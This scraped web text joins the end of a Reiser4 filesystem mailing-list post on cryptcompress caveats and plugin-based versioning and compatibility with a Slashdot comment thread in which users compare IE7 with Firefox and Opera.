from m5stack import * from m5ui import * from uiflow import * from IoTcloud import blynk import hat import hat setScreenColor(0x000000) hat_ncir_0 = hat.get(hat.NCIR) pool_temp_pin = None pool_temp = None label1 = M5TextBox(93, 58, "Text", lcd.FONT_DejaVu56, 0xFFFFFF, rotate=90) title0 = M5Title(title="Title", x=30, fgcolor=0xFFFFFF, bgcolor=0x0000FF) def blynk_read_v1(v_pin): global pool_temp_pin, pool_temp pool_temp_pin = v_pin pool_temp = hat_ncir_0.temperature title0.setTitle('Pool Temp') label1.setText(str(pool_temp)) blynk1.virtual_write(pool_temp, pool_temp) pass blynk1 = blynk.Blynk(token='1234567890') blynk1.handle_event('read v1', blynk_read_v1) while True: blynk1.run() wait_ms(2)
@candide are you trying to connect to the Blynk service with the white screen or the Blynk service with the black screen?
The white screen is Blynk V2 and not currently comparable with the M5Stack due to a change in security system (Blynk V2 uses the digital twin system that is no implemented yet in UIFlow). If it’s the black system V1 then there can be a delay and you need to regenerate the access key.
Thanks! I use v2 (white) so i don't have a solution since v1(black) does not allow new login creation and it is not compatible with v2 login
What else can i use to achieve the same goal. The goal beeing to be able to receive the temp data easily on a mobile phone or any remote device. Thanks
@candide There are many, many more services like M5Stack EZdata, Adafruit Io, Azure, AWS. I just published a book on amazon about these but can't find my manuscript! | https://forum.m5stack.com/topic/4394/cannot-use-blynk-with-m5stickc/2 | CC-MAIN-2022-40 | refinedweb | 364 | 73.17 |
jruby 9.0.4.0 (2.2.2) 2015-11-12 b9fb7aa Java HotSpot(TM) 64-Bit Server VM 24.79-b02 on 1.7.0_79-b15 +jit [Windows 7-amd64] I have the following Java class: ================================================== class JC { private Integer vi; public JC(int i) { vi = new Integer(i); } public void square() { vi = vi*vi; } public Integer get_int() { return vi; } } ================================================== I create (in the Java part of my code) an object of this class, and pass it to a Ruby method. On the Ruby side, I find that I can't invoke the method 'square', even though the object seems to be of the right type: ================================================== include Java class RCconn def initialize @doer = RC.new end def dispatch(jc) puts "Received object of type #{jc.class}" jc.square # @doer.do_your_duty(jc) jc end end ================================================== Inside dispatch, I get: Received object of type Java::Default::JC NoMethodError: undefined method `square' for #<Java::Default::JC:0xa124e5> dispatch at ...... What did I do wrong?
on 2015-11-20 14:30
on 2015-11-20 16:49
Ronald, Put the public modifier before your java class: public class JC { private Integer vi; public JC(int i) { vi = new Integer(i); } public void square() { vi = vi*vi; } public Integer get_int() { return vi; } } Move it to its own file and try again. The method, as you have it, is not accessible to Ruby. Cris
on 2015-11-20 17:20
Cris S. wrote in post #1179417: > Ronald, > > Put the public modifier before your java class Waaaaa! This works!!!! Could you explain, please, why this is necessary? I had JC defined in its own file before, and I could executed all its methods (they are public, after all) from my Java application. Why, then, can't Ruby see it? Does this have to do with package visibility? But I didn't use any package declaration. Ronald
on 2015-11-20 19:18
The other java files were in the same package, so they can see the package level methods. The private, protected, public (and java has no modifier -- package access (or friendly)) are a bit different then Ruby. I came from the java side first and I often get confused on the Ruby side :-). Cris
on 2015-11-20 19:21
Since you are all setup with this example... Answer for me a question. JRuby has the java_package method. If you set your Ruby class to the same package can you access your method w/o the public modifier? Cris
on 2015-11-23 12:40
Cris S. wrote in post #1179422: > JRuby has the java_package method. If you set your Ruby class to the > same package can you access your method w/o the public modifier? It didn't work, but I'm not sure, whether I did it in a right way. Since the Java class JC is in the global namespace, I added to my Ruby file after the include Java: java_package '' But maybe this is not the correct way to specify the global namespace. I searched several places for an explanation of how java_package works, but they don't explain handling the global namespace.
on 2015-11-23 16:23
I am not sure either how one would handle an unnamed package. I suspect you might have to package your code. Cris
on 2015-11-23 18:16
I'm still fighting with how to do packages properly in Java (I've opened a thread on this at...) - maybe, if you have time, you could have a look. It seems to be more difficult than expected, and as soon as I have a solution for this, I will try out java_package. Ronald
on 2015-11-23 18:53
Ronald, Are you aware that in java package structures mandate that your file be in an appropriate directory or compilation fails? If you have package 'phee.phi.pho' Then class 'Phum' must be in the directory phee/phi/pho. It must be in a file named Phum.java if it is has the public modifier before the keyword class. Cris
on 2015-11-23 19:17
Cris S. wrote in post #1179475: > Are you aware that in java package structures mandate that your file be > in an appropriate directory or compilation fails? I thought this is just a convention. It is strange: The compiler could see that the package name does not match the filename, but it did not complain ("file in a wrongly named directory" or something like this) when I compiled it. I will try to modify my example and let you know the findings. Ronald
on 2015-11-24 11:26
Cris S. wrote in post #1179475: > If you have package 'phee.phi.pho' Then class 'Phum' must be in the > directory phee/phi/pho. It must be in a file named Phum.java if it is > has the public modifier before the keyword class. I have now restructured file structure and code accordingly, but running the program now doesn't find the main class. I have attached all files to this message (jr7.zip), in case you would like to hava a look. On Windows, I would run it by executing jr7.bat. I have also isolated the error, since it is not related to java_import, and posted the problem here:...
on 2015-11-24 13:41
OK, fixed it now. There were several small changes necessary, which were not obvious - at least not to me. You find the updated test case in the attachment. As for the java_package on the Ruby side: This did not work as expected. I get the error message NameError: cannot load Java class DoIt I then changed back java_import 'DoIt' do .... to java_import 'foo.DoIt' do ... (although I think this should not be necessary, because we have a java_package 'foo' before that), but same effect. | https://www.ruby-forum.com/topic/6877191 | CC-MAIN-2018-39 | refinedweb | 971 | 73.78 |
Thanks, Felipe. On Mon, Jul 28, 2008 at 8:01 PM, Felipe Lessa <felipe.lessa at gmail.com>wrote: > 2008/7/28 Galchin, Vasili <vigalchin at gmail.com>: > >> and we're suggesting instead: > >> > >> newtype AIOCB = AIOCB (ForeignPtr AIOCB) > > > > ^^^ I am somewhat new to Haskell. Not a total newbie! But what > exactly > > does the above mean? Are the three references of "AIOCB" in different > > namespaces? > > The first and the third are the type AIOCB, the second is the type > constructor AIOCB. That is, it is equivalent (up to renaming) to > > newtype T = C (ForeignPtr T) > > Now, why use Type in Type's definition? It is obvious that if we were > creating > > data T = D T > > it would be pretty useless, however the type that ForeignPtr requires > is just a phantom type. In other words, the ForeignPtr will never use > the C constructor. > > An analogy to C: if you have > > typeA *pa; > typeB *pb; > > then of course pa and pb have different types, however their internal > representation are the same: an integral type of 32/64 bits. The C > compiler only uses the type to provide warnings, to know the fields' > offsets, the size of the structure, etc. The same goes for Haskell, if > you have > > pa :: ForeignPtr A > pb :: ForeignPtr B > > then both pa and pb have different types, but again they have the same > internal representation. However, for example, if you allocate memory > for pa via Storable then the compiler will find the correct sizeOf > definition because will gave the type hint. The compiler also won't > you let mix pa and pb like in [pa,pb]. > > > > So, if you declare > > newtype T = C (ForeignPtr T) > > you are: > > 1) Hiding the ForeignPtr from the users of your library if you don't export > C. > 2) Having type safeness by using ForeignPtr T instead of something > generic like ForeignPtr () -- the same as using typeA* instead of > void*. 
> 3) Not needing to create a different type, like > > data InternalT = InternalT > newtype T = C (ForeignPtr InternalT) > > > Well.. did it help at all? =) > > -- > Felipe. > -------------- next part -------------- An HTML attachment was scrubbed... URL: | http://www.haskell.org/pipermail/haskell-cafe/2008-July/045605.html | CC-MAIN-2014-41 | refinedweb | 348 | 72.16 |
'MainWindow' does not name a type
Hello guys,

I have a class named MyClass, like this:
#ifndef MYCLASS_H
#define MYCLASS_H

#include <QObject>
#include "mainwindow.h"

class MyClass : public QObject
{
    Q_OBJECT
public:
    explicit MyClass(QObject *parent = 0);

    static MainWindow *m_main;
    static void NotifySystem();

public slots:
};

#endif // MYCLASS_H
When I include MyClass.h in my MainWindow.h, the following error appears:
error: 'MainWindow' does not name a type
     MainWindow * m_main ;
     ^
It's something like a dependency loop. How can I use MainWindow in other classes?
- Chris Kawa Moderators last edited by
Yes, it's a dependency cycle.
There is no single answer. The general rule is you model your app like a tree - the top level class instantiates some children, these instantiate some more and so on. The rule is that you never include from above you, so that you don't turn a tree into a graph with cycles.
MainWindow is usually kinda near or at the top so there shouldn't be (m)any things including it.
When you have a class included in mainwindow and you want to access mainwindow from that class it usually is a sign of bad design. The use of static there only strengthens that belief.
The tree-like design is that mainwindow instantiates a child (a dialog, a panel, a manager or whatever), runs some methods on it and retrieves some data from it. The child instance should never know about a mainwindow or any parent for that matter. Everything should look downward.
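To make that concrete, here's a Qt-free sketch of the idea (all the names here are made up, and a std::function hook stands in for a Qt signal): the child exposes a hook, the parent wires itself to it, and the child never receives a parent pointer.

```cpp
#include <cassert>
#include <functional>

// Hypothetical child "panel": it knows nothing about any parent.
// The std::function hook plays the role of a Qt signal in this sketch.
class Panel {
public:
    std::function<void(int)> onResult;  // the "signal"

    void doWork() {
        if (onResult)
            onResult(42);               // the "emit"
    }
};

// The "main window" sits higher in the tree: it owns the child and wires
// itself to the child's hook. The child never looks upward.
class MainWindowSketch {
public:
    MainWindowSketch() {
        panel.onResult = [this](int r) { lastResult = r; };
    }
    void run() { panel.doWork(); }

    int lastResult = 0;

private:
    Panel panel;
};
```

In real Qt code the hook would be a signal and the wiring a connect() call in the main window's constructor, but the direction of knowledge is the same.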
What's your particular use case here? Maybe we can help you find the right design.
@Chris-Kawa thanks for your reply,

I have a WinAPI class which has a CALLBACK function, and it has to be static (Windows rules). In this function I need to update some controls based on the callback result. Because the callback is static I can't use SIGNAL/SLOT, so I have to pass the MainWindow somehow to update it from the static method. How can I implement that without a bad design? :D Thanks.
I have used a forward declaration to fix the error, but it's not standard; I'm looking for the proper way, not a hacky way.
- ambershark Moderators last edited by ambershark
@MrOplus said in 'MainWindow' does not name a type:
i have used the forward declaration to fix the error but it's not standard i'm looking for true way not hacky way
Forward declaration is not only standard but something you should strive for. It will speed up your builds tremendously. I try to almost never include things in my headers if I can avoid it.
The second thing here is you are breaking the rules of OOP if you have interdependent objects like that. Having an object use your main window is quite common but having you main window need that same object #include'd as well is quite abnormal.
So like @Chris-Kawa said it is definitely bad class design/oop. I would fix the design but barring that forward declaration will fix it. You should use forward declaration as much as possible in C++ though. The build speed benefits alone are worth it. :)
Oh and another potential fix is to not include myclass in your mainwindow.h. You can either forward declare there, or better yet just include it in the cpp. If your mainwindow relies on MyClass and MyClass relies on MainWindow that is the bad design part. An
Appledoesn't need to know anything about a
Wormbut the
Wormneeds to know about the
Appleto eat it. So including
Wormin
Applewould be bad since they aren't really related even though one can use/work with the other.
- Chris Kawa Moderators last edited by Chris Kawa
For C like apis (WinApi being an example) you usually create a wrapper class. That wrapper's sole purpose is to wrap the foreign api. It should not mangle with MainWindow. It can emit signals that MainWindow chooses to connect to. This way only MainWindow (higher in the tree) knows about a wrapper (includes it). A dumb wrapper can look like this:
class WinAPiWrapper : public QObject { Q_OBJECT public: WinAPiWrapper(QObject* parent = nullptr) : QObject(parent) { instance = this; } ~WinAPiWrapper() { instance = nullptr; } public slots: void CallSomeWinapi(int param, int param2) { WinApiFunc(param, param2, WinapiCallback); } signals: void SomeWinapiFinished(int ret_param) const; private: static void WinapiCallback(int ret_param) { if (instance) emit instance->SomeWinapiFinished(ret_param); } static WinAPiWrapper* instance; };
Of course it doesn't follow the rules of a good singleton for brevity. Make necessary adjustments.
Some callbacks are nicer than others. The nicer ones have a
void*or similar pointer for user data. This is often used to pass the
thispointer to them and get it back in the callback. With such callbacks you don't even need a singleton solution:
class WinAPiWrapper : public QObject { Q_OBJECT public: WinAPiWrapper(QObject* parent = nullptr) : QObject(parent) {} public slots: void CallSomeWinapi(int param, int param2) { WinApiFunc(param, param2, WinapiCallback, this); //assuming the last param is the void* user data } signals: void SomeWinapiFinished(int ret_param) const; private: static void WinapiCallback(int ret_param, void* user_data) { WinAPiWrapper* instance = reinterpret_cast<WinAPiWrapper*>(user_data); //get back the instance pointer from user data emit instance->SomeWinapiFinished(ret_param); } };
thanks everyone for your helps that's exactly what i want . | https://forum.qt.io/topic/74890/mainwindow-does-not-name-a-type | CC-MAIN-2021-39 | refinedweb | 875 | 59.94 |
AutoMapper is used in Visual Studio which is reusable component where it helps to copy data from one object type to other object type. Basically it does mapping automatically incase if
naming convention of property name found to be same.
Let us try to understand it in more detail from the below Visual Studio code, here we have Class Person and Class Student. If we want to copy data or transfer data from one class to other
we have traditional way of doing it.
First create object “per” of Class Person with following line of code
Person per = new Person();
With some data like First Name and Last Name.
per.FirstName = "Sadgopal";
per.LastName = "Khurana";
Next it to create object “std” of Class Student with following line of code
Student std = new Student();
And then transfer data from source Person Class to destination Student Class is done.
std.FirstName = per.FirstName;
std.LastName = per.LastName;
Tomorrow what if the data i.e. property in the class is increased then writing code for each property data moving from source class to destination class would be more hectic job. In other
words mapping of code is done again and again for source and destination. What if we get a solution where we can keep mapping code centrally and then it used again and again.
Here is where AutoMapper fits and sits in between source class and destination class. With this it will map the property data of both the objects when found property name to be same in
source and destination class.
AutoMapper is not in-build within Visual Studio it has to be installed from the NuGet packages, in order to do installation do a right click Solution > Manage NuGet Packages as shown in the
image down below.
It will open a new pane within Visual Studio with name “NuGet – Solution” as shown in the image down below.
On this pane now click in the “Browse” tab and on the search box type “AutoMapper” here on the search list you will find many AutoMapper’s. Click on the “AutoMapper by Jimmy
Bogard”.
After you click on the right side select existing project “ConsoleApplication3” by doing a checkmark on it and then below click on “Install”.
After you click on install it will prompt a preview window as shown in the image below which says that this installation will make changes internally to the existing selected project
“ConsoleApplication”. In order to proceed installation click OK. Once installation is done you will see details of successful AutoMapper installation down below in “Output” window.
To use installed AutoMapper next is to import name space by typing text “using AutoMapper” as shown in the below image. While writing text to import namespace intellisense will show
autocomplete text which states that AutoMapper is successfully installed.
Once Automapper namespace is imported, next creating Automapper is two steps process where first we have to create map and then use that map.
Create Map
Before we create map keep existing class Person created object “per” and its properties “FirstName” and “LastName” as it is.
Now create map by using following line of code
Mapper.CreateMap();
Here use mapper code with code line “CreateMap” between class Person and class Student.
Using Created Map
Create object “std” of class Student and use created map with object of class Person.
Student std = Mapper.Map(per);
After you finished writing the code Build entire solution to check for coding error if any. After Build is successfully done do place and debug point and run the program when you hover
mouse over the created map you will find the properties value of class Person in class Student.
Please Note: Here you will find that mapping of each property first name and last name was taken automatically between class Person and class Student. This is because naming
convention and property name are same in both class.
Consider the following image where we have property name different for both class Person and class Student. In class Person property name for First name is “FirstName” and Last name is
“LastName” while for class Student property name for First name is “FName” and Last name is “LName”.
Now here, we have to write each property mapping code for each class under our “Create Map” as shown below. We have to include “ForMember” by mentioning explicitly source is
“FirstName”/”LastName” of class Person and destination is “FName/LName” of class Student.
.ForMember(dest => dest.FName, opt => opt.MapFrom(src => src.FirstName)) .ForMember(dest => dest.LName, opt => opt.MapFrom(src => src.LastName))
With above line of code mapping for each property will done.
In this way we can use AutoMapper which is reusable component on our Visual Studio. Hope that the practical of AutoMapper is understood by the reader.
Also we would like to share that if you want to learn C# with full blown project below is starting first video from that series. Do follow this series and practice it your most of the
fundamentals with practical knowledge will also be covered. Hope that you will learn and gain the maximum from it.
Latest Articles
Latest Articles from Ahteshamax
Person per = new Person(); per.FirstName = "Siddi"; per.LastName = "Khadar"; var config = new MapperConfiguration( (cfg => { cfg.CreateMap<Person, Student>(); })); IMapper mapper = config.CreateMapper(); var dest = mapper.Map<Person, Student>(per);
Login to post response | http://www.dotnetfunda.com/articles/show/3450/using-automapper-in-csharp | CC-MAIN-2018-13 | refinedweb | 894 | 62.78 |
Core Concepts
This chapter discusses the concepts that are relevant when you monitor InterSystems IRIS®. This chapter includes the following sections:
Productions
A production is a specialized package of software and documentation that integrates multiple, potentially disparate software systems. A production includes elements that communicate with these external systems, as well as elements that perform processing that is internal to the production.
InterSystems IRIS permits only one production to be running in a given namespace at any given time.
A running production continues to run even when you close the Management Portal.
Production States
It is important to be familiar with the acceptable states of a production, as well as the problem states. These states are displayed in the Management Portal:
Business Hosts
A production includes a number of business hosts that communicate with each other (and with external systems). A business host is responsible for some category of work.
There are three distinct types of business host. In order to monitor a production, it is not necessary to know the details of why a given business host was implemented as a certain type. However, it is useful to be aware of the types:
A business service receives input from outside the production, sometimes by means of an inbound adapter.
A business process is responsible for communication and logic that is entirely within the production.
A business operation usually sends output from the production, sometimes by means of an outbound adapter.
Business operations can also be used for communication and logic within a given production.
Messages
Within a production, all communication is carried out by means of request and response messages between the business hosts. In order to understand a production at a high level, just remember that messages carry all traffic, and that the work of a production is to process messages.
Without exception, the production message warehouse stores all messages, and this information is available in the Management Portal. This section provides an overview of messages and the information that is available about them:
Sessions, which correspond to sets of messages related in time
Message Invocation Style and Time stamps
Message Basics
Every message is either a request or a response. There may be requests that do not have a corresponding response defined, but every response is (conceptually) paired with a request. Any request may be synchronous (waits for a response) or asynchronous (does not wait), depending on the details of the business host; you cannot configure this.
Each message has a unique numeric identifier or ID. This is displayed in many places in the Management Portal, with the caption ID or <ObjectId>, depending on the location on the page.
A message has a header, whose structure is the same for all messages. The header contains data fields that help route the message through the system. A message also contains a body, which provides different fields depending on the message type.
Each message uses a specific message body class, chosen by the production developers. The message body class determines whether the message is a request or a response and determines the fields that the message contains. These decisions are not configurable once the production is complete.
For Electronic Document Interchange (EDI) formats, InterSystems IRIS provides specialized message body classes that represent the message as a virtual document. In this case, the message body does not contain fields to represent data in the message. InterSystems IRIS provides alternative mechanisms for accessing that data. For an introduction, see Using Virtual Documents in Productions.
The Management Portal displays contents of the message as a whole, treating the message header and the message body as a single unit. The ID of the message header is the ID of the message as a whole. In some cases (for example, if you resend a message), a new header is added (with a new unique ID); as a result, the ID of the resent message is not the same as that of the original message.
Sessions
Every message is associated with a specific session. A session marks the beginning and end of all the activities prompted by a primary request message from outside InterSystems IRIS. Sessions are useful to you because they give you an easy way to see sets of related messages; the Management Portal provides an option for visually tracing the messages, and you can filter this display by session.
Each session has a unique numeric SessionID. All messages associated with a session use the same SessionID. InterSystems IRIS assigns these SessionIDs as follows:
The primary request message starts the session. The SessionID is the same as the ID of the primary request message.
Each additional message that is instantiated during this session has the same SessionID as the primary request, but has a unique message ID.
The following shows an example. Note that (unlike the example) the message IDs within a session are unlikely to be sequential in a production that has many business hosts. When creating a new message, InterSystems IRIS always uses the next available integer as the message ID.
Message Status
Each message has a life cycle during which its status changes. These statuses are visible on most pages that display messages. The possible status of any message is one of the following:
The message is in transit between its sender and the appropriate queue. This is the first stage in the normal life cycle of a message.
The message is on a queue. This is the second stage in the normal life cycle of a message.
The intended recipient has received the message. This is the third stage in the normal life cycle of a message.
The intended recipient has received the message and has finished processing the message. This is the fourth stage in the normal life cycle of a message.
This status applies only to response messages.
A business operation can defer a message response for later delivery. The response can be picked up and sent back to the original requester by any business host in the production. Between the time when the business operation defers the response, and when the response is finally sent, the response message has a status of Deferred.
The sender of the original message is unaware of the fact that the message was deferred. If the original call was synchronous, the call does not return to the sender until the response is sent.
When the response message is finally sent, it has a status of Completed.
A response message becomes Discarded if it reached its destination after the timeout period for the corresponding request expired.
You can also manually mark a message as Discarded, which you might do for a suspended message that cannot be delivered for some reason.
Note that a message that is marked as Discarded still remains in the permanent store; messages are deleted only when you explicitly delete them.
The message was suspended by the business operation after failing to reach its external destination or was manually suspended by an administrator. Note that some business operations are designed to set the status of any failed messages to Suspended.
In either case, you can view this message within the Management Portal to determine why it failed and you can resend it if appropriate. For example, if the problem is on the external side of the communication, the external system can be repaired, and then the message can be resent. You could also discard it or even delete it.
The message was aborted by an administrator.
The message encountered an error.
Note that request and response messages have separate statuses. Request-response pairs are not tracked together for various reasons: a request might be repeated several times before it is successfully delivered; some requests have an optional response that can be ignored if it does not arrive; some responses can be deferred for later delivery; some requests are designed to have no response.
Message Invocation Style and Time Stamps
Each message has an invocation style, which describes how the message was sent. The business host that sends a message specifies its invocation style:
Queue means the message is created in one job, then placed on a queue, at which time the original job is released. Later, when the message is processed, a different job will be allocated for the task.
Inproc means the message will be formulated, sent, and delivered in the same job in which it was created. The job will not be available again in the sender’s pool until the message is delivered to the target.
InterSystems IRIS records the following two time stamps for each message. Note that the invocation style affects the meaning of these time stamps:
The message creation time stamp. For Queue messages, this is when InterSystems IRIS placed this message on the queue. For Inproc messages, this is when InterSystems IRIS called the Send method.
The message processed time stamp. InterSystems IRIS sets TimeProcessed when the message is taken off of the queue but then resets it to the current time while the message is being processed. Typically, for a completed message, it represents the time that the message processing was completed.
Message Priority
The Management Portal displays the priority of the messages in several places. The priority of a message determines how that message is handled relative to other messages in the same message queue. For information about message queues, see the chapter “Monitoring a Production.”
The InterSystems IRIS messaging engine determines the priority of a message, which is one of the following:
HighSync (1) — Used for ACK messages and alarms for interrupted tasks.
Sync (2) — Used for synchronous messages.
SimSync (4) — Used for an asynchronous call made for a BPL synchronous <call>. This ensures that the request and response are processed before any queued asynchronous message.
Async (6) — Used for other asynchronous messages.
Jobs and Message Queues
The business hosts process messages by means of jobs. A job is a CPU process that hosts the work done by a production. This terminology is intended to avoid confusion between CPU processes (“jobs”) and business processes (“processes”).
In general, a job is either running (processing a message) or it is not running. From a low-level, system viewpoint, a production consists almost entirely of jobs waiting to wake up to perform work.
A pool consists of one or more jobs. Each business host can have its own, private pool of allocated jobs — a pool with a specific size that cannot be exceeded.
When a business host receives a message, the business host assigns the work to a job from its pool. The job then performs the work. If no job is available, the business host waits for a job to become available. After the job completes the work, the job either returns to the pool or starts work on another message.
More formally, each message is assigned to a specific message queue, which handles messages in the order that it receives them. Each queue is associated with a single pool, and vice versa.
Unlike other types of business host, a business process can use a public pool (called the actor pool), which receives messages from a public queue (called the actor queue or Ens.Actor
Opens in a new window). The actor pool and actor queue are shared by all business processes that do not use private pools and queues.
For further information, see “Pool Size and Actor Pool Size” in Configuring Productions. | https://docs.intersystems.com/healthconnectlatest/csp/docbook/DocBook.UI.Page.cls?KEY=EMONITOR_CONCEPTS | CC-MAIN-2021-25 | refinedweb | 1,902 | 54.32 |
Pipes can be used in threads and processes. The program below demonstrates how pipes can be used in processes. A new process can be created using the system call fork(). It returns two differnt values to the child and parent. The value 0 is returned to the child (new) process and the PID (Process ID) of the child is returned to the parent process. This is used to distinguish between the two processes. In the program given below, the child process waits for the user input and once an input is entered, it writes into the pipe. And the parent process reads from the pipe.
A sample program to demonstrate how pipes are used in Linux Processes
#include <stdio.h> #include <sys/types.h> #include <unistd.h> #include <stdlib.h> #include <string.h> #define MSGLEN 64 int main(){ int fd[2]; pid_t pid; int result; //Creating a pipe result = pipe (fd); if (result < 0) { //failure in creating a pipe perror("pipe"); exit (1); } //Creating a child process pid = fork(); if (pid < 0) { //failure in creating a child perror ("fork"); exit(2); } if (pid == 0) { //Child process char message[MSGLEN]; while(1) { //Clearing the message memset (message, 0, sizeof(message)); printf ("Enter a message: "); scanf ("%s",message); //Writing message to the pipe write(fd[1], message, strlen(message)); } exit (0); } else { //Parent Process char message[MSGLEN]; while (1) { //Clearing the message buffer memset (message, 0, sizeof(message)); //Reading message from the pipe read (fd[0], message, sizeof(message)); printf("Message entered %s\n",message); } exit(0); } }
Note here that the pipe() system call was called before the system call fork(). The buffer allocated to the pipe is accessible to both the processes. | https://linuxprograms.wordpress.com/category/pipes/ | CC-MAIN-2015-40 | refinedweb | 281 | 62.58 |
,
On 4 f=E9vr. 06, at 19:46, Jean Boucquey wrote:
> ! $(CXX) -r -keep_private_externs -nostdlib -o=20
> $(WXC-OUTDIR)/master.o $^ $(WXC-LIBS) /usr/lib/gcc/darwin/3.3/
This is interesting : what version of gcc did you use to compile=20
wxhaskell/wxWidgets/ghc?
I'm not entirely sure how this all fits together, but there might also=20=
have been some kind of version mismatch between the gcc's used to=20
compile ghc, wxWidgets and wxhaskell (indirectly through ghc).
Perhaps this version mismatch is what your fix ended up uncovering?=20
Because, otherwise, I'm a little puzzled as to why what wouldn't work=20
for you seems to work for me.
Hmm. Anyway, I guess what would be really sweet is something makes it=20=
possible to use wxhaskell without a static wxWidgets; this would=20
greatly simplify the DarwinPorts stuff.
Thanks,
--=20
Eric Kow
PGP Key ID: 08AC04F9 Merci de corriger mon fran=E7ais.
Hello,
Just to keep you updated: I finally succeeded to build wxHaskell =20
2.6.2 with GHC 6.4.1 on Mac OS 10.4.4.
The "trick" was to add a static C++ standard lib to the libraries =20
used to build "master.o" (see the patch hereafter).
As I'm not an Mac OS X expert, I don't know if this is valid but it =20
works (the linker now warns for duplicate symbols where before it was =20=
complaining that the symbol was undefined).
I compiled and ran the different sample applications. They all went =20
OK except the GLCanvas ones (I do not remember if I compiled wxMac =20
with OpenGL... I will check) and NotebookRight.hs that got an Haskell =20=
typing error.
Hope it helps,
Jean
*** wxhaskell-0.9.4/makefile Sun May 8 08:45:23 2005
--- wxhaskell-0.9.4-works/makefile Sat Feb 4 14:26:28 2006
***************
***)
$(CXX) -dynamiclib -install_name $(SHARED-PREFIX)$(notdir =20
$@) -undefined suppress -flat_namespace -o $@ $(WXC-OUTDIR)/master.o $=20=
(filter-out %.a,$(WXC-LIBS))
$(RM) -f $(WXC-OUTDIR)/master.o
---) /usr/lib/gcc/darwin/3.3/libstdc++.a
$(CXX) -dynamiclib -install_name $(SHARED-PREFIX)$(notdir =20
$@) -undefined suppress -flat_namespace -o $@ $(WXC-OUTDIR)/master.o $=20=
(filter-out %.a,$(WXC-LIBS))
$(RM) -f $(WXC-OUTDIR)/master.o
Le 01-f=E9vr.-06 =E0 20:49, Eric Kow a =E9crit :
> Hi,
>
> Yes, I have encountered this before, and it was very annoying.
> See:
>
> The thing that fixed it for me is --disable-shared with wxWidgets, =20
> which is odd because you seem to have configured with that as well.
>
> Maybe you should make sure you don't still have the shared version =20
> around. For example, you could do wx-config --libs
> and wxconfig --libs --static to see if they are different. If you =20
> want to keep both versions, maybe something like (wxhaskell) ./=20
> configure --wx-config=3D"wx-config --static" would help.
>
> Glad to know I'm not alone there. Luckily, we've also got Gregory =20
> Wright, the guy who takes care of haskell stuff on DarwinPorts, on =20
> our side :-)
>
> On 1 f=E9vr. 06, at 19:37, Jean Boucquey wrote:
>> I'm trying to build wxHaskell 0.9.4 with wxMac 2.6.1 (tried with =20
>> 2.6.2) and GHC 6.4.1 on MacOS 10.4.4 (gcc 4.0.0).
>> wxWidget is configured with --disable-shared and --disable-unicode.
>>
>> Compilation of the "wxc" layer goes fine but the linking of libwxc-=20=
>> mac2.6.1-0.9.4.dylib fails complaining about "weak definitions":
>> ld: out/wxc/master.o undefined symbol 36218 (__ZdaPv) can't be a =20
>> weak definition
>>
>> Before I dig into the "dirty" details, I would like to know if I =20
>> missed anything and/or if anybody encourtered this before (and =20
>> maybe knows the solution...).
>
>
> --=20
> Eric Kow
> PGP Key ID: 08AC04F9 Merci de corriger mon fran=E7ais.
>
>
I agree to receive quotes, newsletters and other information from sourceforge.net and its partners regarding IT services and products. I understand that I can withdraw my consent at any time. Please refer to our Privacy Policy or Contact Us for more details | https://sourceforge.net/p/wxhaskell/mailman/wxhaskell-users/?viewmonth=200602&viewday=4 | CC-MAIN-2017-22 | refinedweb | 698 | 68.67 |
New Release candidate v1.20.0.rc9
Hello everyone, there is a new firmware release candidate, v1.20.0.rc9, released today. The new release includes the following:
Improvements:
- Releasing GIL when ssl handshake is performed.
- Allow PDN list update when carrier is defined in LTE
- Add support for LTE modem responses greater than UART buff size
- Added check for LTE band support against both SW and HW versions of the LTE modem.
- Updated Sqns upgrade scripts to v1.2.5
Bug Fixes:
- Enabling access to the 2nd SPI peripheral for GPy modules
- Use Hardware timers for Lora timer tick to fix RTOS timer drifts when cache is disabled.
- Updated OTA fixing failing OTAs after switching to Factory Partition.
- Fix crash when pin ISR handler fires (i.e. LoRa TX done) during flash operation PR #278 by Martijn Thé @martijnthe
- Remove defaulting of wifi max_tx_pwr to level 20 in init()
- modlora: Reverted the rx spread factor in stats
You can download the source code here
or you can flash it directly via the Firmware Updater tool as the latest development firmware.
Also, new Sequans Firmwares for CAT-M1 [41065] and NB-IoT [41019] are available for download; see this post.
NOTE: To upgrade to the new Sequans Firmwares 41065 and 41019 you should use this latest Development release or the latest Stable release v1.18.2.r4
@tlanier
Found the answer to my question. If I select the stable version in the Firmware Upgrade Tool and then select the Type/Version to development, I get the option to select 1.20.0.rc9.
Where can I get the GPy-1.20.0.rc9.tar.gz file? The file is not found on the GPy downloads web page.
We have done extensive testing of our product with this version and have shipped production units. Now we have purchased new GPy's and when I try to use the Firmware Update Tool version 1.15.2.b1 with development releases checked, the 1.20.0.rc9 option is not available.
Any help would be appreciated. We will update and test our program to work with newer releases later, but for now we need to use the well tested version. I know it was a beta version, but for our purposes it worked well. The production version at the time had issues which the beta version solved.
The iccid() function only works after an attach command is attempted. Since we use the ICCID to determine the correct APN to use in the attach command, we have to do a dummy attach call, read the iccid, detach, and then correctly attach with the computed apn. Hope this helps others until this issue is resolved.
Below is the revised code that now works.
from network import LTE
from time import sleep_ms   # sleep_ms lives in MicroPython's time module

lte = LTE()
lte.reset()
lte.init()
sleep_ms(1500)
iccid = lte.iccid()            # does not work
lte.attach(apn='unknown')      # attempt attach so iccid() will work
sleep_ms(1500)
iccid = lte.iccid()            # iccid() now works
lte.detach(reset=False)
# compute apn from iccid
lte.attach(apn=computed_apn)   # attach with correct apn
TA: Loc Do
Due Sunday, Sep 09, 2012 @ 23:59:59
Goals
This assignment is designed to give you some practice with C.
Submission
Create a directory named "hw2" inside your working repository and put your solutions to problems 1 and 2 in hw2.txt, and problem 3 in bitcount.c.
It is important that you place your submission for hw2 inside this directory and not somewhere else, as when we pull submissions, we will look for your submission there. Then run these commands:
git add -A
git commit -m "hw2 submission"
git tag -f hw2
git push --tags origin master
Problem 1
P&H (Revised 4th) exercise 2.33.2 for option b: Convert this function into pointer-based code.
void shift(int a[], int n)
{
    int i;
    for (i = 0; i != n-1; i++)
        a[i] = a[i+1];
}
Problem 2
a) Complete the following setName, getStudentID, and setStudentID functions. You may assume the pointers given are valid and not null.
#include <stdio.h>
#include <stdlib.h>

#define MAX_NAME_LEN 127

typedef struct {
    char name[MAX_NAME_LEN + 1];
    unsigned long sid;
} Student;

/* return the name of student s */
const char* getName(const Student* s) {
    return s->name;
}

/* set the name of student s
   If name is too long, cut off characters after the
   maximum number of characters allowed. */
void setName(Student* s, const char* name) {
    /* fill me in */
}

/* return the SID of student s */
